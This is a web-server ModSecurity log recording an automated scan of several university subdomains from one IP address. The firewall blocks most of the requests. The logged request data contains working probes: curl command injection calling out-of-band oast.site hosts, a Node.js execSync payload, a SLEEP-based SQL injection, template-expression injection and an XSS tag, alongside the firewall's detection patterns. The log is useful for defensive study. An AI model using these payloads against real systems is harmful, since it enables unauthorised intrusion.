[Tue Aug 29 11:31:52.353567 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbfd\\xb8\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlgazsuk1ppkuk31.oast.site+-H+'User-Agent:+LGgfDE'};\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbfd\\xb8\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlge9kerp9easndh.oast.site+-H+'User-Agent:+LGgfDE'};"] [unique_id "ZO10uMCo-f0AAAP@M4MAAAAZ"]
[Tue Aug 29 11:31:52.397136 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbfd\\xb8\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlgqsxqic7fbeahy.oast.site+-H+'User-Agent:+LGgfDE'};\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbfd\\xb8\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlga7jcwn47y88b4.oast.site+-H+'User-Agent:+LGgfDE'};"] [unique_id "ZO10uMCo-f0AAAQQynQAAAAy"]
[Tue Aug 29 11:31:52.405037 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wiki/pages/createpage-entervariables.action"] [unique_id "ZO10uMCo-f0AAAPiBmIAAAAB"]
[Tue Aug 29 11:31:52.536108 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/pages/doenterpagevariables.action"] [unique_id "ZO10uMCo-f0AAAPiBmgAAAAB"]
[Tue Aug 29 11:31:52.545537 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sgcgoogleanalytic. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)</ found within ARGS:sgcgoogleanalytic: <script>console.log(\\x22document.domain\\x22)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO10uMCo-f0AAAP5mLoAAAAM"]
[Tue Aug 29 11:31:52.552961 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbfd\\xb8\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlghpohwb6sxcuya.oast.site+-H+'User-Agent:+LGgfDE'};\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbfd\\xb8\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlgaqusycd9dracj.oast.site+-H+'User-Agent:+LGgfDE'};"] [unique_id "ZO10uMCo-f0AAAPDn@YAAAAP"]
[Tue Aug 29 11:31:52.582675 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:document. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:             (() => {\\x0a         found within ARGS:document:             (() => {\\x0a        const process = clearImmediate.constructor(\\x22return process;\\x22)();\\x0a        const result = process.mainModule.require(\\x22child_process\\x22).execSync(\\x22id > build/css/2Udxkf4l8YMdxIMziw7l7YPgbXU.css\\x22);\\x0a        console.log(\\x22Result: \\x22   result);\\x0a        return true;\\x0a    })()        "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/checkValid"] [unique_id "ZO10uMCo-f0AAAPDn@cAAAAP"]
[Tue Aug 29 11:31:52.602828 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/pages/doenterpagevariables.action"] [unique_id "ZO10uMCo-f0AAAPDn@gAAAAP"]
[Tue Aug 29 11:31:52.619375 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wiki/pages/createpage-entervariables.action"] [unique_id "ZO10uMCo-f0AAAQQynwAAAAy"]
[Tue Aug 29 11:31:52.651677 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/pages/doenterpagevariables.action"] [unique_id "ZO10uMCo-f0AAAN@5K0AAAAO"]
[Tue Aug 29 11:31:53.343165 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO10ucCo-f0AAAQSWPAAAAA0"]
[Tue Aug 29 11:31:53.363631 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO10ucCo-f0AAAQSWPEAAAA0"]
[Tue Aug 29 11:31:53.365187 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO10ucCo-f0AAANWgV8AAAAG"]
[Tue Aug 29 11:31:53.369383 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/pages/doenterpagevariables.action"] [unique_id "ZO10ucCo-f0AAAP5mMIAAAAM"]
[Tue Aug 29 11:31:53.387935 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO10ucCo-f0AAAQJWxkAAAAr"]
[Tue Aug 29 11:31:53.389004 2023] [:error] [pid 1071] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: No boundaries found in payload."] [severity "CRITICAL"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10ucCo-f0AAAQv1kcAAAAA"]
[Tue Aug 29 11:31:53.389163 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO10ucCo-f0AAAQNwJ8AAAAv"]
[Tue Aug 29 11:31:53.411827 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/pages/createpage.action"] [unique_id "ZO10ucCo-f0AAAPiBm0AAAAB"]
[Tue Aug 29 11:31:53.432066 2023] [:error] [pid 1071] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/pages/createpage.action"] [unique_id "ZO10ucCo-f0AAAQv1kkAAAAA"]
[Tue Aug 29 11:31:53.450858 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/pages/doenterpagevariables.action"] [unique_id "ZO10ucCo-f0AAANWgWIAAAAG"]
[Tue Aug 29 11:31:54.341990 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/pages/createpage.action"] [unique_id "ZO10usCo-f0AAAP@M4gAAAAZ"]
[Tue Aug 29 11:31:54.366526 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/pages/createpage.action"] [unique_id "ZO10usCo-f0AAAQR49AAAAAz"]
[Tue Aug 29 11:31:54.368601 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/pages/templates2/viewpagetemplate.action"] [unique_id "ZO10usCo-f0AAAQSWPcAAAA0"]
[Tue Aug 29 11:31:54.370935 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO10usCo-f0AAAP8G2QAAAAV"]
[Tue Aug 29 11:31:54.371308 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/pages/createpage.action"] [unique_id "ZO10usCo-f0AAAPDn-IAAAAP"]
[Tue Aug 29 11:31:54.377655 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:document. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:             (() => {\\x0a         found within ARGS:document:             (() => {\\x0a        const process = clearImmediate.constructor(\\x22return process;\\x22)();\\x0a        const result = process.mainModule.require(\\x22child_process\\x22).execSync(\\x22id > build/css/2Udxkf4l8YMdxIMziw7l7YPgbXU.css\\x22);\\x0a        console.log(\\x22Result: \\x22   result);\\x0a        return true;\\x0a    })()        "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/checkValid"] [unique_id "ZO10usCo-f0AAAQkBY8AAAAC"]
[Tue Aug 29 11:31:54.396941 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/pages/templates2/viewpagetemplate.action"] [unique_id "ZO10usCo-f0AAAQkBZAAAAAC"]
[Tue Aug 29 11:31:55.324556 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/pages/templates2/viewpagetemplate.action"] [unique_id "ZO10u8Co-f0AAAQkBZIAAAAC"]
